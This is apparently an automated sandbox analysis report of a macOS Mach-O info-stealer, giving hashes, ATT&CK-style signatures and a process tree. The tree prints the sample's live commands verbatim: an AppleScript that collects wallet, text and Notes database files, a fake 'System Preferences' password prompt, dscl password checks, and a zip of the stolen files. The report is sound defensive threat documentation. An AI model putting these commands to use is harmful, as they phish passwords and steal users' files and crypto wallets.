Analysis
- max time kernel: 104s
- max time network: 140s
- platform: macos-10.15_amd64
- resource: macos-20240711.1-en
- resource tags: arch:amd64, arch:i386, image:macos-20240711.1-en, kernel:19b77a, locale:en-us, os:macos-10.15-amd64, system
- submitted: 02-08-2024 18:01
Static task
static1
General
- Target: 0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho
- Size: 436KB
- MD5: d14dd58a8382407676d4a8f00383d068
- SHA1: 0a34331ec2ad1b23ad22c131ee41b27135d9e413
- SHA256: 0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a
- SHA512: f7458e7dc4116dc159bd90fc2cb099128d8dba255e5a365fa4db0f8bc89a5a2931dda104059dd3a83badb5b92aa93a8cb58663d7200a486a81a7cad032ac5b00
- SSDEEP: 6144:Ie9S+e5rQkIVSA0qnm3YFVr+cYJv5DSV5QMyuhVQDmXEboFG7gPe1K2G4MavHjij:IT5rQkIwA0QFVyca0Ld9ci+FxFjsP
Malware Config
Signatures
- Queries the macOS version information. 1 TTPs 2 IoCs
  An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
  ioc | Process
  sh -c sw_vers | Process not Found
  sw_vers | Process not Found
- System Checks 1 TTPs 2 IoCs
  Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.
  ioc | Process
  sh -c "system_profiler SPHardwareDataType" | Process not Found
  system_profiler SPHardwareDataType | Process not Found
- AppleScript 1 TTPs 4 IoCs
  AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.
  ioc | Process
  osascript -e "tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell" | Process not Found
  sh -c "osascript -e 'display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'" | Process not Found
  osascript -e "display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬" | Process not Found
  sh -c "osascript -e 'tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell' > /dev/null 2>&1" | Process not Found
- Resource Forking 1 TTPs 1 IoCs
  Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.
  ioc | Process
  /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper | Process not Found
Processes
Path | Command line | Depth⤵ PID
- /bin/sh | sh -c "sudo /bin/zsh -c \"/Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho\"" | 1⤵ PID:481
- /bin/bash | sh -c "sudo /bin/zsh -c \"/Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho\"" | 1⤵ PID:481
- /usr/bin/sudo | sudo /bin/zsh -c /Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho | 1⤵ PID:481
- /bin/zsh | /bin/zsh -c /Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho | 2⤵ PID:485
- /Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho | /Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho | 2⤵ PID:485
- /usr/libexec/xpcproxy | xpcproxy "com.apple.xpc.launchd.oneshot.0x10000001.Problem Reporter" | 1⤵ PID:515
- /System/Library/CoreServices/Problem Reporter.app/Contents/MacOS/Problem Reporter | "/System/Library/CoreServices/Problem Reporter.app/Contents/MacOS/Problem Reporter" -psn_0_151589 | 1⤵ PID:515
- /bin/launchctl | /bin/launchctl kill SIGTERM system/com.microsoft.OneDriveUpdaterDaemon | 1⤵ PID:533
- /bin/launchctl | /bin/launchctl kill SIGTERM system/com.microsoft.OneDriveStandaloneUpdaterDaemon | 1⤵ PID:534
- /usr/libexec/xpcproxy | xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E | 1⤵ PID:542
- /System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService | /System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService | 1⤵ PID:542
- /usr/libexec/xpcproxy | xpcproxy com.apple.xpc.launchd.oneshot.0x10000002.0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho | 1⤵ PID:548
- /Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho | /Users/run/0db57feffa1f92816f9477fcbaa2b3456657c5251a720a996fb0a824ddc5a71a.macho -psn_0_159783 | 1⤵ PID:548
- /usr/libexec/xpcproxy | xpcproxy com.apple.metadata.mdwrite | 1⤵ PID:549
- /bin/sh | sh -c "dscl /Local/Default -authonly run \"\"" | 1⤵ PID:550
- /bin/bash | sh -c "dscl /Local/Default -authonly run \"\"" | 1⤵ PID:550
- /usr/bin/dscl | dscl /Local/Default -authonly run | 1⤵ PID:550
- /bin/sh | sh -c "osascript -e 'display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'" | 1⤵ PID:551
- /bin/bash | sh -c "osascript -e 'display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬'" | 1⤵ PID:551
- /usr/bin/osascript | osascript -e "display dialog \"macOS needs to access System settings Please enter your password.\" with title \"System Preferences\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:ToolbarAdvanced.icns\" default answer \"\" giving up after 30 with hidden answer ¬" | 1⤵ PID:551
- /usr/libexec/xpcproxy | xpcproxy com.apple.ReportMemoryException | 1⤵ PID:555
- /usr/libexec/ReportMemoryException | /usr/libexec/ReportMemoryException | 1⤵ PID:555
- /bin/sh | sh -c "dscl /Local/Default -authonly run root" | 1⤵ PID:556
- /bin/bash | sh -c "dscl /Local/Default -authonly run root" | 1⤵ PID:556
- /usr/bin/dscl | dscl /Local/Default -authonly run root | 1⤵ PID:556
- /bin/sh | sh -c "system_profiler SPHardwareDataType" | 1⤵ PID:557
- /bin/bash | sh -c "system_profiler SPHardwareDataType" | 1⤵ PID:557
- /usr/sbin/system_profiler | system_profiler SPHardwareDataType | 1⤵ PID:557
- /bin/sh | sh -c "system_profiler SPDisplaysDataType" | 1⤵ PID:559
- /bin/bash | sh -c "system_profiler SPDisplaysDataType" | 1⤵ PID:559
- /usr/sbin/system_profiler | system_profiler SPDisplaysDataType | 1⤵ PID:559
- /bin/sh | sh -c sw_vers | 1⤵ PID:561
- /bin/bash | sh -c sw_vers | 1⤵ PID:561
- /usr/bin/sw_vers | sw_vers | 1⤵ PID:561
- /bin/sh | sh -c "osascript -e 'tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell' > /dev/null 2>&1" | 1⤵ PID:562
- /bin/bash | sh -c "osascript -e 'tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell' > /dev/null 2>&1" | 1⤵ PID:562
- /usr/bin/osascript | osascript -e "tell application \"Finder\" set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set docsFiles to every file of documentsFolder whose name extension is in {\"txt\", \"rtf\", \"wallet\", \"web3\", \"dat\"} set allFiles to srcFiles & docsFiles if exists POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\" then set allFiles to allFiles & {POSIX file \"/Users/run/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\"} end if repeat with aFile in allFiles duplicate aFile to POSIX file \"/Users/run/152742989/FileGrabber\" with replacing end repeat end tell" | 2⤵ PID:563
- /usr/libexec/xpcproxy | xpcproxy com.apple.DesktopServicesHelper.7DDF301E-7638-4EBB-A42C-64D115067DC7 | 1⤵ PID:567
- /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper | /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper | 1⤵ PID:567
- /bin/sh | sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/152742989 /Users/run/152742989.zip --norsrc --noextattr" | 1⤵ PID:568
- /bin/bash | sh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/152742989 /Users/run/152742989.zip --norsrc --noextattr" | 1⤵ PID:568
- /usr/bin/ditto | ditto -c -k --sequesterRsrc --keepParent /Users/run/152742989 /Users/run/152742989.zip --norsrc --noextattr | 1⤵ PID:568
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 676B
  MD5: 23ced6333bfbe8f6e784cab3a1ed1829
  SHA1: 5ff3829d53559afd5052933e05139195b4ae7fc2
  SHA256: acbac05d02ecfb383ffeaad7e6a2449d81f3d8b3198b029c0d9488c0d0043a62
  SHA512: 9d9957d0df62b2327f2808ed39fc567b46f408c923e633c376b41c3817c5233a423158b79bc52c1fd874ec25be5569128931a6ae8cd3701f7f42c63507a37d7c
- Filesize: 90KB
  MD5: 4e9060f76c1cb5b54005dc6640a58f0d
  SHA1: 04a1e6791ae55612d9b63f23ccb37eec398b3d27
  SHA256: 5b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3
  SHA512: be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148
- Filesize: 20KB
  MD5: 2a3fa78b5f55b529a2698ad187c80204
  SHA1: cbbda35512038de511ac23b0aed12e9e86bcc796
  SHA256: d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b
  SHA512: e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab
- Filesize: 40KB
  MD5: b6914d8e5cb470236eceed8d6f8b4fb7
  SHA1: cdff8880e9fa7630fc8d57af4669365b5ab29b60
  SHA256: 45bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1
  SHA512: 1c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7
- Filesize: 96KB
  MD5: 7357bcc0190ae9659f882b67dc9f5627
  SHA1: 3085ef48c757fd6e21f93ed4bf061b22557f49de
  SHA256: 86e8e7c7bcc0b1c022693bdccdb116410eb8fac871a21e49be995be9642797db
  SHA512: 3f93e76133598fa537576237c1198538861e614e5bc8e50549992b8885d493c385733a7f47c6d18c0d90a9ecd9b6b265bd4fd9c25be83224d5b5baa6c0828c91
- Filesize: 1KB
  MD5: 6d3ab465c72882304f2a113936881f79
  SHA1: c8cacdcf241e88fae285aec4c378fc3d1f806d04
  SHA256: 96ea6b98341d29912de016bfcdec019fceeffb027ab7be08f7833603b5be43a9
  SHA512: 2bf8d2ac1fef35ac5304a86a01fc43f5f74c9d7dac8098c509315d310505f6b9537f401e0f54b8e3064e0142f2af322eeaba2b226dec354aeeb007ffa73ac7b1
- Filesize: 112KB
  MD5: cd67d104f366d3edc60d45f8cf730335
  SHA1: 048b8101be8ffdc24eb3260c8b6591e6308093c4
  SHA256: 58b2e590d0cdb1d333d3c6c48a7bc3492ec20016db7e0838a4f52633c14d4e69
  SHA512: 9f70fae1f2a4cbb91fe8e07b4ca02a754f8d9a9b2325b2d8fc880dd3a3c88f129410801ddff682c03c6954380d09f4b21aeb041d44927988c06efbbe3fab1f98
- Filesize: 4B
  MD5: 63a9f0ea7bb98050796b649e85481845
  SHA1: dc76e9f0c0006e8f919e0c515c66dbba3982f785
  SHA256: 4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2
  SHA512: 99adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8